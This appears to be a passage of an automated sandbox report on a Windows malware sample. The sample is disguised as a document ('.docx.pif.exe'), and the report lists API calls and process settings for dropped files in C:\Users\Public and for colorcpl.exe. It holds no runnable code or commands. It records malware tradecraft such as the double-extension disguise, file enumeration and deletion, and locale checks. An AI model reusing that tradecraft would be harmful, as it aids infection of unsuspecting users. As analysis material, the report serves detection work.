Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\xkn.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\Public\alpha.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, | 0_2_029858B4 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 8_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 8_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 8_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 8_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 8_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 10_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 10_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 10_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 10_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 10_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 12_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 12_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 12_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 12_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 12_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 14_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 14_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 14_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 14_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 14_2_00007FF64B5635B8 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose, | 17_2_00007FF64B57823C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, | 17_2_00007FF64B572978 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose, | 17_2_00007FF64B587B4C |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, | 17_2_00007FF64B561560 |
Source: C:\Users\Public\alpha.exe | Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, | 17_2_00007FF64B5635B8 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, | 31_2_04589665 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, | 31_2_04589253 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, | 31_2_0459C291 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, | 31_2_0458C34D |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, | 31_2_0458BD37 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045CE879 FindFirstFileExA, | 31_2_045CE879 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, | 31_2_0458880C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458783C FindFirstFileW,FindNextFileW, | 31_2_0458783C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW, | 31_2_04599AF5 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, | 31_2_0458BB30 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, | 0_2_0299DAA4 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_02985A78 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, | 0_2_029A5E01 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: GetLocaleInfoA, | 0_2_0298A7A0 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: GetLocaleInfoA, | 0_2_0298A754 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, | 0_2_02985B84 |
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess, | 0_2_0299DAA4 |
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, | 8_2_00007FF64B5751EC |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, | 8_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, | 8_2_00007FF64B573140 |
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, | 10_2_00007FF64B5751EC |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, | 10_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, | 10_2_00007FF64B573140 |
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, | 12_2_00007FF64B5751EC |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, | 12_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, | 12_2_00007FF64B573140 |
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, | 14_2_00007FF64B5751EC |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, | 14_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, | 14_2_00007FF64B573140 |
Source: C:\Users\Public\alpha.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, | 17_2_00007FF64B5751EC |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, | 17_2_00007FF64B566EE4 |
Source: C:\Users\Public\alpha.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, | 17_2_00007FF64B573140 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW, | 31_2_045C8404 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, | 31_2_045D243C |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW, | 31_2_045D2543 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, | 31_2_045D2610 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW, | 31_2_045D2036 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, | 31_2_045D20C3 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW, | 31_2_045D2313 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, | 31_2_045D1CD8 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW, | 31_2_045D1F50 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW, | 31_2_045D1F9B |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA, | 31_2_0458F8D1 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW, | 31_2_045C88ED |